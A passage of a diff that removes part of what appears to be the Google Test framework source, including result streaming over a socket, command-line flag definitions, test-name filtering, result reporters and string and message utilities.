-      const int len = static_cast<int>(message.length());
-      if (write(sockfd_, message.c_str(), len) != len) {
-        GTEST_LOG_(WARNING)
-            << "stream_result_to: failed to stream to "
-            << host_name_ << ":" << port_num_;
-      }
-    }
-
-   private:
-    // Creates a client socket and connects to the server.
-    void MakeConnection();
-
-    // Closes the socket.
-    void CloseConnection() {
-      GTEST_CHECK_(sockfd_ != -1)
-          << "CloseConnection() can be called only when there is a connection.";
-
-      close(sockfd_);
-      sockfd_ = -1;
-    }
-
-    int sockfd_;  // socket file descriptor
-    const string host_name_;
-    const string port_num_;
-
-    GTEST_DISALLOW_COPY_AND_ASSIGN_(SocketWriter);
-  };  // class SocketWriter
-
-  // Escapes '=', '&', '%', and '\n' characters in str as "%xx".
-  static string UrlEncode(const char* str);
-
-  StreamingListener(const string& host, const string& port)
-      : socket_writer_(new SocketWriter(host, port)) { Start(); }
-
-  explicit StreamingListener(AbstractSocketWriter* socket_writer)
-      : socket_writer_(socket_writer) { Start(); }
-
-  void OnTestProgramStart(const UnitTest& /* unit_test */) {
-    SendLn("event=TestProgramStart");
-  }
-
-  void OnTestProgramEnd(const UnitTest& unit_test) {
-    // Note that Google Test current only report elapsed time for each
-    // test iteration, not for the entire test program.
-    SendLn("event=TestProgramEnd&passed=" + FormatBool(unit_test.Passed()));
-
-    // Notify the streaming server to stop.
-    socket_writer_->CloseConnection();
-  }
-
-  void OnTestIterationStart(const UnitTest& /* unit_test */, int iteration) {
-    SendLn("event=TestIterationStart&iteration=" +
-           StreamableToString(iteration));
-  }
-
-  void OnTestIterationEnd(const UnitTest& unit_test, int /* iteration */) {
-    SendLn("event=TestIterationEnd&passed=" +
-           FormatBool(unit_test.Passed()) + "&elapsed_time=" +
-           StreamableToString(unit_test.elapsed_time()) + "ms");
-  }
-
-  void OnTestCaseStart(const TestCase& test_case) {
-    SendLn(std::string("event=TestCaseStart&name=") + test_case.name());
-  }
-
-  void OnTestCaseEnd(const TestCase& test_case) {
-    SendLn("event=TestCaseEnd&passed=" + FormatBool(test_case.Passed())
-           + "&elapsed_time=" + StreamableToString(test_case.elapsed_time())
-           + "ms");
-  }
-
-  void OnTestStart(const TestInfo& test_info) {
-    SendLn(std::string("event=TestStart&name=") + test_info.name());
-  }
-
-  void OnTestEnd(const TestInfo& test_info) {
-    SendLn("event=TestEnd&passed=" +
-           FormatBool((test_info.result())->Passed()) +
-           "&elapsed_time=" +
-           StreamableToString((test_info.result())->elapsed_time()) + "ms");
-  }
-
-  void OnTestPartResult(const TestPartResult& test_part_result) {
-    const char* file_name = test_part_result.file_name();
-    if (file_name == NULL)
-      file_name = "";
-    SendLn("event=TestPartResult&file=" + UrlEncode(file_name) +
-           "&line=" + StreamableToString(test_part_result.line_number()) +
-           "&message=" + UrlEncode(test_part_result.message()));
-  }
-
- private:
-  // Sends the given message and a newline to the socket.
-  void SendLn(const string& message) { socket_writer_->SendLn(message); }
-
-  // Called at the start of streaming to notify the receiver what
-  // protocol we are using.
-  void Start() { SendLn("gtest_streaming_protocol_version=1.0"); }
-
-  string FormatBool(bool value) { return value ? "1" : "0"; }
-
-  const scoped_ptr<AbstractSocketWriter> socket_writer_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(StreamingListener);
-};  // class StreamingListener
-
-#endif  // GTEST_CAN_STREAM_RESULTS_
-
-}  // namespace internal
-}  // namespace testing
-
-#endif  // GTEST_SRC_GTEST_INTERNAL_INL_H_
-#undef GTEST_IMPLEMENTATION_
-
-#if GTEST_OS_WINDOWS
-# define vsnprintf _vsnprintf
-#endif  // GTEST_OS_WINDOWS
-
-namespace testing {
-
-using internal::CountIf;
-using internal::ForEach;
-using internal::GetElementOr;
-using internal::Shuffle;
-
-// Constants.
-
-// A test whose test case name or test name matches this filter is
-// disabled and not run.
-static const char kDisableTestFilter[] = "DISABLED_*:*/DISABLED_*";
-
-// A test case whose name matches this filter is considered a death
-// test case and will be run before test cases whose name doesn't
-// match this filter.
-static const char kDeathTestCaseFilter[] = "*DeathTest:*DeathTest/*";
-
-// A test filter that matches everything.
-static const char kUniversalFilter[] = "*";
-
-// The default output file for XML output.
-static const char kDefaultOutputFile[] = "test_detail.xml";
-
-// The environment variable name for the test shard index.
-static const char kTestShardIndex[] = "GTEST_SHARD_INDEX";
-// The environment variable name for the total number of test shards.
-static const char kTestTotalShards[] = "GTEST_TOTAL_SHARDS";
-// The environment variable name for the test shard status file.
-static const char kTestShardStatusFile[] = "GTEST_SHARD_STATUS_FILE";
-
-namespace internal {
-
-// The text used in failure messages to indicate the start of the
-// stack trace.
-const char kStackTraceMarker[] = "\nStack trace:\n";
-
-// g_help_flag is true iff the --help flag or an equivalent form is
-// specified on the command line.
-bool g_help_flag = false;
-
-}  // namespace internal
-
-static const char* GetDefaultFilter() {
-  return kUniversalFilter;
-}
-
-GTEST_DEFINE_bool_(
-    also_run_disabled_tests,
-    internal::BoolFromGTestEnv("also_run_disabled_tests", false),
-    "Run disabled tests too, in addition to the tests normally being run.");
-
-GTEST_DEFINE_bool_(
-    break_on_failure,
-    internal::BoolFromGTestEnv("break_on_failure", false),
-    "True iff a failed assertion should be a debugger break-point.");
-
-GTEST_DEFINE_bool_(
-    catch_exceptions,
-    internal::BoolFromGTestEnv("catch_exceptions", true),
-    "True iff " GTEST_NAME_
-    " should catch exceptions and treat them as test failures.");
-
-GTEST_DEFINE_string_(
-    color,
-    internal::StringFromGTestEnv("color", "auto"),
-    "Whether to use colors in the output.  Valid values: yes, no, "
-    "and auto.  'auto' means to use colors if the output is "
-    "being sent to a terminal and the TERM environment variable "
-    "is set to a terminal type that supports colors.");
-
-GTEST_DEFINE_string_(
-    filter,
-    internal::StringFromGTestEnv("filter", GetDefaultFilter()),
-    "A colon-separated list of glob (not regex) patterns "
-    "for filtering the tests to run, optionally followed by a "
-    "'-' and a : separated list of negative patterns (tests to "
-    "exclude).  A test is run if it matches one of the positive "
-    "patterns and does not match any of the negative patterns.");
-
-GTEST_DEFINE_bool_(list_tests, false,
-                   "List all tests without running them.");
-
-GTEST_DEFINE_string_(
-    output,
-    internal::StringFromGTestEnv("output", ""),
-    "A format (currently must be \"xml\"), optionally followed "
-    "by a colon and an output file name or directory. A directory "
-    "is indicated by a trailing pathname separator. "
-    "Examples: \"xml:filename.xml\", \"xml::directoryname/\". "
-    "If a directory is specified, output files will be created "
-    "within that directory, with file-names based on the test "
-    "executable's name and, if necessary, made unique by adding "
-    "digits.");
-
-GTEST_DEFINE_bool_(
-    print_time,
-    internal::BoolFromGTestEnv("print_time", true),
-    "True iff " GTEST_NAME_
-    " should display elapsed time in text output.");
-
-GTEST_DEFINE_int32_(
-    random_seed,
-    internal::Int32FromGTestEnv("random_seed", 0),
-    "Random number seed to use when shuffling test orders.  Must be in range "
-    "[1, 99999], or 0 to use a seed based on the current time.");
-
-GTEST_DEFINE_int32_(
-    repeat,
-    internal::Int32FromGTestEnv("repeat", 1),
-    "How many times to repeat each test.  Specify a negative number "
-    "for repeating forever.  Useful for shaking out flaky tests.");
-
-GTEST_DEFINE_bool_(
-    show_internal_stack_frames, false,
-    "True iff " GTEST_NAME_ " should include internal stack frames when "
-    "printing test failure stack traces.");
-
-GTEST_DEFINE_bool_(
-    shuffle,
-    internal::BoolFromGTestEnv("shuffle", false),
-    "True iff " GTEST_NAME_
-    " should randomize tests' order on every run.");
-
-GTEST_DEFINE_int32_(
-    stack_trace_depth,
-    internal::Int32FromGTestEnv("stack_trace_depth", kMaxStackTraceDepth),
-    "The maximum number of stack frames to print when an "
-    "assertion fails.  The valid range is 0 through 100, inclusive.");
-
-GTEST_DEFINE_string_(
-    stream_result_to,
-    internal::StringFromGTestEnv("stream_result_to", ""),
-    "This flag specifies the host name and the port number on which to stream "
-    "test results. Example: \"localhost:555\". The flag is effective only on "
-    "Linux.");
-
-GTEST_DEFINE_bool_(
-    throw_on_failure,
-    internal::BoolFromGTestEnv("throw_on_failure", false),
-    "When this flag is specified, a failed assertion will throw an exception "
-    "if exceptions are enabled or exit the program with a non-zero code "
-    "otherwise.");
-
-namespace internal {
-
-// Generates a random number from [0, range), using a Linear
-// Congruential Generator (LCG).  Crashes if 'range' is 0 or greater
-// than kMaxRange.
-UInt32 Random::Generate(UInt32 range) {
-  // These constants are the same as are used in glibc's rand(3).
-  state_ = (1103515245U*state_ + 12345U) % kMaxRange;
-
-  GTEST_CHECK_(range > 0)
-      << "Cannot generate a number in the range [0, 0).";
-  GTEST_CHECK_(range <= kMaxRange)
-      << "Generation of a number in [0, " << range << ") was requested, "
-      << "but this can only generate numbers in [0, " << kMaxRange << ").";
-
-  // Converting via modulus introduces a bit of downward bias, but
-  // it's simple, and a linear congruential generator isn't too good
-  // to begin with.
-  return state_ % range;
-}
-
-// GTestIsInitialized() returns true iff the user has initialized
-// Google Test.  Useful for catching the user mistake of not initializing
-// Google Test before calling RUN_ALL_TESTS().
-//
-// A user must call testing::InitGoogleTest() to initialize Google
-// Test.  g_init_gtest_count is set to the number of times
-// InitGoogleTest() has been called.  We don't protect this variable
-// under a mutex as it is only accessed in the main thread.
-GTEST_API_ int g_init_gtest_count = 0;
-static bool GTestIsInitialized() { return g_init_gtest_count != 0; }
-
-// Iterates over a vector of TestCases, keeping a running sum of the
-// results of calling a given int-returning method on each.
-// Returns the sum.
-static int SumOverTestCaseList(const std::vector<TestCase*>& case_list,
-                               int (TestCase::*method)() const) {
-  int sum = 0;
-  for (size_t i = 0; i < case_list.size(); i++) {
-    sum += (case_list[i]->*method)();
-  }
-  return sum;
-}
-
-// Returns true iff the test case passed.
-static bool TestCasePassed(const TestCase* test_case) {
-  return test_case->should_run() && test_case->Passed();
-}
-
-// Returns true iff the test case failed.
-static bool TestCaseFailed(const TestCase* test_case) {
-  return test_case->should_run() && test_case->Failed();
-}
-
-// Returns true iff test_case contains at least one test that should
-// run.
-static bool ShouldRunTestCase(const TestCase* test_case) {
-  return test_case->should_run();
-}
-
-// AssertHelper constructor.
-AssertHelper::AssertHelper(TestPartResult::Type type,
-                           const char* file,
-                           int line,
-                           const char* message)
-    : data_(new AssertHelperData(type, file, line, message)) {
-}
-
-AssertHelper::~AssertHelper() {
-  delete data_;
-}
-
-// Message assignment, for assertion streaming support.
-void AssertHelper::operator=(const Message& message) const {
-  UnitTest::GetInstance()->
-    AddTestPartResult(data_->type, data_->file, data_->line,
-                      AppendUserMessage(data_->message, message),
-                      UnitTest::GetInstance()->impl()
-                      ->CurrentOsStackTraceExceptTop(1)
-                      // Skips the stack frame for this function itself.
-                      );  // NOLINT
-}
-
-// Mutex for linked pointers.
-GTEST_API_ GTEST_DEFINE_STATIC_MUTEX_(g_linked_ptr_mutex);
-
-// Application pathname gotten in InitGoogleTest.
-std::string g_executable_path;
-
-// Returns the current application's name, removing directory path if that
-// is present.
-FilePath GetCurrentExecutableName() {
-  FilePath result;
-
-#if GTEST_OS_WINDOWS
-  result.Set(FilePath(g_executable_path).RemoveExtension("exe"));
-#else
-  result.Set(FilePath(g_executable_path));
-#endif  // GTEST_OS_WINDOWS
-
-  return result.RemoveDirectoryName();
-}
-
-// Functions for processing the gtest_output flag.
-
-// Returns the output format, or "" for normal printed output.
-std::string UnitTestOptions::GetOutputFormat() {
-  const char* const gtest_output_flag = GTEST_FLAG(output).c_str();
-  if (gtest_output_flag == NULL) return std::string("");
-
-  const char* const colon = strchr(gtest_output_flag, ':');
-  return (colon == NULL) ?
-      std::string(gtest_output_flag) :
-      std::string(gtest_output_flag, colon - gtest_output_flag);
-}
-
-// Returns the name of the requested output file, or the default if none
-// was explicitly specified.
-std::string UnitTestOptions::GetAbsolutePathToOutputFile() {
-  const char* const gtest_output_flag = GTEST_FLAG(output).c_str();
-  if (gtest_output_flag == NULL)
-    return "";
-
-  const char* const colon = strchr(gtest_output_flag, ':');
-  if (colon == NULL)
-    return internal::FilePath::ConcatPaths(
-        internal::FilePath(
-            UnitTest::GetInstance()->original_working_dir()),
-        internal::FilePath(kDefaultOutputFile)).string();
-
-  internal::FilePath output_name(colon + 1);
-  if (!output_name.IsAbsolutePath())
-    // TODO(wan@google.com): on Windows \some\path is not an absolute
-    // path (as its meaning depends on the current drive), yet the
-    // following logic for turning it into an absolute path is wrong.
-    // Fix it.
-    output_name = internal::FilePath::ConcatPaths(
-        internal::FilePath(UnitTest::GetInstance()->original_working_dir()),
-        internal::FilePath(colon + 1));
-
-  if (!output_name.IsDirectory())
-    return output_name.string();
-
-  internal::FilePath result(internal::FilePath::GenerateUniqueFileName(
-      output_name, internal::GetCurrentExecutableName(),
-      GetOutputFormat().c_str()));
-  return result.string();
-}
-
-// Returns true iff the wildcard pattern matches the string.  The
-// first ':' or '\0' character in pattern marks the end of it.
-//
-// This recursive algorithm isn't very efficient, but is clear and
-// works well enough for matching test names, which are short.
-bool UnitTestOptions::PatternMatchesString(const char *pattern,
-                                           const char *str) {
-  switch (*pattern) {
-    case '\0':
-    case ':':  // Either ':' or '\0' marks the end of the pattern.
-      return *str == '\0';
-    case '?':  // Matches any single character.
-      return *str != '\0' && PatternMatchesString(pattern + 1, str + 1);
-    case '*':  // Matches any string (possibly empty) of characters.
-      return (*str != '\0' && PatternMatchesString(pattern, str + 1)) ||
-          PatternMatchesString(pattern + 1, str);
-    default:  // Non-special character.  Matches itself.
-      return *pattern == *str &&
-          PatternMatchesString(pattern + 1, str + 1);
-  }
-}
-
-bool UnitTestOptions::MatchesFilter(
-    const std::string& name, const char* filter) {
-  const char *cur_pattern = filter;
-  for (;;) {
-    if (PatternMatchesString(cur_pattern, name.c_str())) {
-      return true;
-    }
-
-    // Finds the next pattern in the filter.
-    cur_pattern = strchr(cur_pattern, ':');
-
-    // Returns if no more pattern can be found.
-    if (cur_pattern == NULL) {
-      return false;
-    }
-
-    // Skips the pattern separater (the ':' character).
-    cur_pattern++;
-  }
-}
-
-// Returns true iff the user-specified filter matches the test case
-// name and the test name.
-bool UnitTestOptions::FilterMatchesTest(const std::string &test_case_name,
-                                        const std::string &test_name) {
-  const std::string& full_name = test_case_name + "." + test_name.c_str();
-
-  // Split --gtest_filter at '-', if there is one, to separate into
-  // positive filter and negative filter portions
-  const char* const p = GTEST_FLAG(filter).c_str();
-  const char* const dash = strchr(p, '-');
-  std::string positive;
-  std::string negative;
-  if (dash == NULL) {
-    positive = GTEST_FLAG(filter).c_str();  // Whole string is a positive filter
-    negative = "";
-  } else {
-    positive = std::string(p, dash);   // Everything up to the dash
-    negative = std::string(dash + 1);  // Everything after the dash
-    if (positive.empty()) {
-      // Treat '-test1' as the same as '*-test1'
-      positive = kUniversalFilter;
-    }
-  }
-
-  // A filter is a colon-separated list of patterns.  It matches a
-  // test if any pattern in it matches the test.
-  return (MatchesFilter(full_name, positive.c_str()) &&
-          !MatchesFilter(full_name, negative.c_str()));
-}
-
-#if GTEST_HAS_SEH
-// Returns EXCEPTION_EXECUTE_HANDLER if Google Test should handle the
-// given SEH exception, or EXCEPTION_CONTINUE_SEARCH otherwise.
-// This function is useful as an __except condition.
-int UnitTestOptions::GTestShouldProcessSEH(DWORD exception_code) {
-  // Google Test should handle a SEH exception if:
-  //   1. the user wants it to, AND
-  //   2. this is not a breakpoint exception, AND
-  //   3. this is not a C++ exception (VC++ implements them via SEH,
-  //      apparently).
-  //
-  // SEH exception code for C++ exceptions.
-  // (see http://support.microsoft.com/kb/185294 for more information).
-  const DWORD kCxxExceptionCode = 0xe06d7363;
-
-  bool should_handle = true;
-
-  if (!GTEST_FLAG(catch_exceptions))
-    should_handle = false;
-  else if (exception_code == EXCEPTION_BREAKPOINT)
-    should_handle = false;
-  else if (exception_code == kCxxExceptionCode)
-    should_handle = false;
-
-  return should_handle ? EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH;
-}
-#endif  // GTEST_HAS_SEH
-
-}  // namespace internal
-
-// The c'tor sets this object as the test part result reporter used by
-// Google Test.  The 'result' parameter specifies where to report the
-// results. Intercepts only failures from the current thread.
-ScopedFakeTestPartResultReporter::ScopedFakeTestPartResultReporter(
-    TestPartResultArray* result)
-    : intercept_mode_(INTERCEPT_ONLY_CURRENT_THREAD),
-      result_(result) {
-  Init();
-}
-
-// The c'tor sets this object as the test part result reporter used by
-// Google Test.  The 'result' parameter specifies where to report the
-// results.
-ScopedFakeTestPartResultReporter::ScopedFakeTestPartResultReporter(
-    InterceptMode intercept_mode, TestPartResultArray* result)
-    : intercept_mode_(intercept_mode),
-      result_(result) {
-  Init();
-}
-
-void ScopedFakeTestPartResultReporter::Init() {
-  internal::UnitTestImpl* const impl = internal::GetUnitTestImpl();
-  if (intercept_mode_ == INTERCEPT_ALL_THREADS) {
-    old_reporter_ = impl->GetGlobalTestPartResultReporter();
-    impl->SetGlobalTestPartResultReporter(this);
-  } else {
-    old_reporter_ = impl->GetTestPartResultReporterForCurrentThread();
-    impl->SetTestPartResultReporterForCurrentThread(this);
-  }
-}
-
-// The d'tor restores the test part result reporter used by Google Test
-// before.
-ScopedFakeTestPartResultReporter::~ScopedFakeTestPartResultReporter() {
-  internal::UnitTestImpl* const impl = internal::GetUnitTestImpl();
-  if (intercept_mode_ == INTERCEPT_ALL_THREADS) {
-    impl->SetGlobalTestPartResultReporter(old_reporter_);
-  } else {
-    impl->SetTestPartResultReporterForCurrentThread(old_reporter_);
-  }
-}
-
-// Increments the test part result count and remembers the result.
-// This method is from the TestPartResultReporterInterface interface.
-void ScopedFakeTestPartResultReporter::ReportTestPartResult(
-    const TestPartResult& result) {
-  result_->Append(result);
-}
-
-namespace internal {
-
-// Returns the type ID of ::testing::Test.  We should always call this
-// instead of GetTypeId< ::testing::Test>() to get the type ID of
-// testing::Test.  This is to work around a suspected linker bug when
-// using Google Test as a framework on Mac OS X.  The bug causes
-// GetTypeId< ::testing::Test>() to return different values depending
-// on whether the call is from the Google Test framework itself or
-// from user test code.  GetTestTypeId() is guaranteed to always
-// return the same value, as it always calls GetTypeId<>() from the
-// gtest.cc, which is within the Google Test framework.
-TypeId GetTestTypeId() {
-  return GetTypeId<Test>();
-}
-
-// The value of GetTestTypeId() as seen from within the Google Test
-// library.  This is solely for testing GetTestTypeId().
-extern const TypeId kTestTypeIdInGoogleTest = GetTestTypeId();
-
-// This predicate-formatter checks that 'results' contains a test part
-// failure of the given type and that the failure message contains the
-// given substring.
-AssertionResult HasOneFailure(const char* /* results_expr */,
-                              const char* /* type_expr */,
-                              const char* /* substr_expr */,
-                              const TestPartResultArray& results,
-                              TestPartResult::Type type,
-                              const string& substr) {
-  const std::string expected(type == TestPartResult::kFatalFailure ?
-                        "1 fatal failure" :
-                        "1 non-fatal failure");
-  Message msg;
-  if (results.size() != 1) {
-    msg << "Expected: " << expected << "\n"
-        << "  Actual: " << results.size() << " failures";
-    for (int i = 0; i < results.size(); i++) {
-      msg << "\n" << results.GetTestPartResult(i);
-    }
-    return AssertionFailure() << msg;
-  }
-
-  const TestPartResult& r = results.GetTestPartResult(0);
-  if (r.type() != type) {
-    return AssertionFailure() << "Expected: " << expected << "\n"
-                              << "  Actual:\n"
-                              << r;
-  }
-
-  if (strstr(r.message(), substr.c_str()) == NULL) {
-    return AssertionFailure() << "Expected: " << expected << " containing \""
-                              << substr << "\"\n"
-                              << "  Actual:\n"
-                              << r;
-  }
-
-  return AssertionSuccess();
-}
-
-// The constructor of SingleFailureChecker remembers where to look up
-// test part results, what type of failure we expect, and what
-// substring the failure message should contain.
-SingleFailureChecker:: SingleFailureChecker(
-    const TestPartResultArray* results,
-    TestPartResult::Type type,
-    const string& substr)
-    : results_(results),
-      type_(type),
-      substr_(substr) {}
-
-// The destructor of SingleFailureChecker verifies that the given
-// TestPartResultArray contains exactly one failure that has the given
-// type and contains the given substring.  If that's not the case, a
-// non-fatal failure will be generated.
-SingleFailureChecker::~SingleFailureChecker() {
-  EXPECT_PRED_FORMAT3(HasOneFailure, *results_, type_, substr_);
-}
-
-DefaultGlobalTestPartResultReporter::DefaultGlobalTestPartResultReporter(
-    UnitTestImpl* unit_test) : unit_test_(unit_test) {}
-
-void DefaultGlobalTestPartResultReporter::ReportTestPartResult(
-    const TestPartResult& result) {
-  unit_test_->current_test_result()->AddTestPartResult(result);
-  unit_test_->listeners()->repeater()->OnTestPartResult(result);
-}
-
-DefaultPerThreadTestPartResultReporter::DefaultPerThreadTestPartResultReporter(
-    UnitTestImpl* unit_test) : unit_test_(unit_test) {}
-
-void DefaultPerThreadTestPartResultReporter::ReportTestPartResult(
-    const TestPartResult& result) {
-  unit_test_->GetGlobalTestPartResultReporter()->ReportTestPartResult(result);
-}
-
-// Returns the global test part result reporter.
-TestPartResultReporterInterface*
-UnitTestImpl::GetGlobalTestPartResultReporter() {
-  internal::MutexLock lock(&global_test_part_result_reporter_mutex_);
-  return global_test_part_result_repoter_;
-}
-
-// Sets the global test part result reporter.
-void UnitTestImpl::SetGlobalTestPartResultReporter(
-    TestPartResultReporterInterface* reporter) {
-  internal::MutexLock lock(&global_test_part_result_reporter_mutex_);
-  global_test_part_result_repoter_ = reporter;
-}
-
-// Returns the test part result reporter for the current thread.
-TestPartResultReporterInterface*
-UnitTestImpl::GetTestPartResultReporterForCurrentThread() {
-  return per_thread_test_part_result_reporter_.get();
-}
-
-// Sets the test part result reporter for the current thread.
-void UnitTestImpl::SetTestPartResultReporterForCurrentThread(
-    TestPartResultReporterInterface* reporter) {
-  per_thread_test_part_result_reporter_.set(reporter);
-}
-
-// Gets the number of successful test cases.
-int UnitTestImpl::successful_test_case_count() const {
-  return CountIf(test_cases_, TestCasePassed);
-}
-
-// Gets the number of failed test cases.
-int UnitTestImpl::failed_test_case_count() const {
-  return CountIf(test_cases_, TestCaseFailed);
-}
-
-// Gets the number of all test cases.
-int UnitTestImpl::total_test_case_count() const {
-  return static_cast<int>(test_cases_.size());
-}
-
-// Gets the number of all test cases that contain at least one test
-// that should run.
-int UnitTestImpl::test_case_to_run_count() const {
-  return CountIf(test_cases_, ShouldRunTestCase);
-}
-
-// Gets the number of successful tests.
-int UnitTestImpl::successful_test_count() const {
-  return SumOverTestCaseList(test_cases_, &TestCase::successful_test_count);
-}
-
-// Gets the number of failed tests.
-int UnitTestImpl::failed_test_count() const {
-  return SumOverTestCaseList(test_cases_, &TestCase::failed_test_count);
-}
-
-// Gets the number of disabled tests that will be reported in the XML report.
-int UnitTestImpl::reportable_disabled_test_count() const {
-  return SumOverTestCaseList(test_cases_,
-                             &TestCase::reportable_disabled_test_count);
-}
-
-// Gets the number of disabled tests.
-int UnitTestImpl::disabled_test_count() const {
-  return SumOverTestCaseList(test_cases_, &TestCase::disabled_test_count);
-}
-
-// Gets the number of tests to be printed in the XML report.
-int UnitTestImpl::reportable_test_count() const {
-  return SumOverTestCaseList(test_cases_, &TestCase::reportable_test_count);
-}
-
-// Gets the number of all tests.
-int UnitTestImpl::total_test_count() const {
-  return SumOverTestCaseList(test_cases_, &TestCase::total_test_count);
-}
-
-// Gets the number of tests that should run.
-int UnitTestImpl::test_to_run_count() const {
-  return SumOverTestCaseList(test_cases_, &TestCase::test_to_run_count);
-}
-
-// Returns the current OS stack trace as an std::string.
-//
-// The maximum number of stack frames to be included is specified by
-// the gtest_stack_trace_depth flag.  The skip_count parameter
-// specifies the number of top frames to be skipped, which doesn't
-// count against the number of frames to be included.
-//
-// For example, if Foo() calls Bar(), which in turn calls
-// CurrentOsStackTraceExceptTop(1), Foo() will be included in the
-// trace but Bar() and CurrentOsStackTraceExceptTop() won't.
-std::string UnitTestImpl::CurrentOsStackTraceExceptTop(int skip_count) {
-  (void)skip_count;
-  return "";
-}
-
-// Returns the current time in milliseconds.
-TimeInMillis GetTimeInMillis() {
-#if GTEST_OS_WINDOWS_MOBILE || defined(__BORLANDC__)
-  // Difference between 1970-01-01 and 1601-01-01 in milliseconds.
-  // http://analogous.blogspot.com/2005/04/epoch.html
-  const TimeInMillis kJavaEpochToWinFileTimeDelta =
-    static_cast<TimeInMillis>(116444736UL) * 100000UL;
-  const DWORD kTenthMicrosInMilliSecond = 10000;
-
-  SYSTEMTIME now_systime;
-  FILETIME now_filetime;
-  ULARGE_INTEGER now_int64;
-  // TODO(kenton@google.com): Shouldn't this just use
-  //   GetSystemTimeAsFileTime()?
-  GetSystemTime(&now_systime);
-  if (SystemTimeToFileTime(&now_systime, &now_filetime)) {
-    now_int64.LowPart = now_filetime.dwLowDateTime;
-    now_int64.HighPart = now_filetime.dwHighDateTime;
-    now_int64.QuadPart = (now_int64.QuadPart / kTenthMicrosInMilliSecond) -
-      kJavaEpochToWinFileTimeDelta;
-    return now_int64.QuadPart;
-  }
-  return 0;
-#elif GTEST_OS_WINDOWS && !GTEST_HAS_GETTIMEOFDAY_
-  __timeb64 now;
-
-  // MSVC 8 deprecates _ftime64(), so we want to suppress warning 4996
-  // (deprecated function) there.
-  // TODO(kenton@google.com): Use GetTickCount()?  Or use
-  //   SystemTimeToFileTime()
-  GTEST_DISABLE_MSC_WARNINGS_PUSH_(4996)
-  _ftime64(&now);
-  GTEST_DISABLE_MSC_WARNINGS_POP_()
-
-  return static_cast<TimeInMillis>(now.time) * 1000 + now.millitm;
-#elif GTEST_HAS_GETTIMEOFDAY_
-  struct timeval now;
-  gettimeofday(&now, NULL);
-  return static_cast<TimeInMillis>(now.tv_sec) * 1000 + now.tv_usec / 1000;
-#else
-# error "Don't know how to get the current time on your system."
-#endif
-}
-
-// Utilities
-
-// class String.
-
-#if GTEST_OS_WINDOWS_MOBILE
-// Creates a UTF-16 wide string from the given ANSI string, allocating
-// memory using new. The caller is responsible for deleting the return
-// value using delete[]. Returns the wide string, or NULL if the
-// input is NULL.
-LPCWSTR String::AnsiToUtf16(const char* ansi) {
-  if (!ansi) return NULL;
-  const int length = strlen(ansi);
-  const int unicode_length =
-      MultiByteToWideChar(CP_ACP, 0, ansi, length,
-                          NULL, 0);
-  WCHAR* unicode = new WCHAR[unicode_length + 1];
-  MultiByteToWideChar(CP_ACP, 0, ansi, length,
-                      unicode, unicode_length);
-  unicode[unicode_length] = 0;
-  return unicode;
-}
-
-// Creates an ANSI string from the given wide string, allocating
-// memory using new. The caller is responsible for deleting the return
-// value using delete[]. Returns the ANSI string, or NULL if the
-// input is NULL.
-const char* String::Utf16ToAnsi(LPCWSTR utf16_str)  {
-  if (!utf16_str) return NULL;
-  const int ansi_length =
-      WideCharToMultiByte(CP_ACP, 0, utf16_str, -1,
-                          NULL, 0, NULL, NULL);
-  char* ansi = new char[ansi_length + 1];
-  WideCharToMultiByte(CP_ACP, 0, utf16_str, -1,
-                      ansi, ansi_length, NULL, NULL);
-  ansi[ansi_length] = 0;
-  return ansi;
-}
-
-#endif  // GTEST_OS_WINDOWS_MOBILE
-
-// Compares two C strings.  Returns true iff they have the same content.
-//
-// Unlike strcmp(), this function can handle NULL argument(s).  A NULL
-// C string is considered different to any non-NULL C string,
-// including the empty string.
-bool String::CStringEquals(const char * lhs, const char * rhs) {
-  if ( lhs == NULL ) return rhs == NULL;
-
-  if ( rhs == NULL ) return false;
-
-  return strcmp(lhs, rhs) == 0;
-}
-
-#if GTEST_HAS_STD_WSTRING || GTEST_HAS_GLOBAL_WSTRING
-
-// Converts an array of wide chars to a narrow string using the UTF-8
-// encoding, and streams the result to the given Message object.
-static void StreamWideCharsToMessage(const wchar_t* wstr, size_t length,
-                                     Message* msg) {
-  for (size_t i = 0; i != length; ) {  // NOLINT
-    if (wstr[i] != L'\0') {
-      *msg << WideStringToUtf8(wstr + i, static_cast<int>(length - i));
-      while (i != length && wstr[i] != L'\0')
-        i++;
-    } else {
-      *msg << '\0';
-      i++;
-    }
-  }
-}
-
-#endif  // GTEST_HAS_STD_WSTRING || GTEST_HAS_GLOBAL_WSTRING
-
-}  // namespace internal
-
-// Constructs an empty Message.
-// We allocate the stringstream separately because otherwise each use of
-// ASSERT/EXPECT in a procedure adds over 200 bytes to the procedure's
-// stack frame leading to huge stack frames in some cases; gcc does not reuse
-// the stack space.
-Message::Message() : ss_(new ::std::stringstream) {
-  // By default, we want there to be enough precision when printing
-  // a double to a Message.
-  *ss_ << std::setprecision(std::numeric_limits<double>::digits10 + 2);
-}
-
-// These two overloads allow streaming a wide C string to a Message
-// using the UTF-8 encoding.
-Message& Message::operator <<(const wchar_t* wide_c_str) {
-  return *this << internal::String::ShowWideCString(wide_c_str);
-}
-Message& Message::operator <<(wchar_t* wide_c_str) {
-  return *this << internal::String::ShowWideCString(wide_c_str);
-}
-
-#if GTEST_HAS_STD_WSTRING
-// Converts the given wide string to a narrow string using the UTF-8
-// encoding, and streams the result to this Message object.
-Message& Message::operator <<(const ::std::wstring& wstr) {
-  internal::StreamWideCharsToMessage(wstr.c_str(), wstr.length(), this);
-  return *this;
-}
-#endif  // GTEST_HAS_STD_WSTRING
-
-#if GTEST_HAS_GLOBAL_WSTRING
-// Converts the given wide string to a narrow string using the UTF-8
-// encoding, and streams the result to this Message object.
-Message& Message::operator <<(const ::wstring& wstr) {
-  internal::StreamWideCharsToMessage(wstr.c_str(), wstr.length(), this);
-  return *this;
-}
-#endif  // GTEST_HAS_GLOBAL_WSTRING
-
-// Gets the text streamed to this object so far as an std::string.
-// Each '\0' character in the buffer is replaced with "\\0".
-std::string Message::GetString() const {
-  return internal::StringStreamToString(ss_.get());
-}
-
-// AssertionResult constructors.
-// Used in EXPECT_TRUE/FALSE(assertion_result).
-AssertionResult::AssertionResult(const AssertionResult& other)
-    : success_(other.success_),
-      message_(other.message_.get() != NULL ?
-               new ::std::string(*other.message_) :
-               static_cast< ::std::string*>(NULL)) {
-}
-
-// Swaps two AssertionResults.
-void AssertionResult::swap(AssertionResult& other) {
-  using std::swap;
-  swap(success_, other.success_);
-  swap(message_, other.message_);
-}
-
-// Returns the assertion's negation. Used with EXPECT/ASSERT_FALSE.
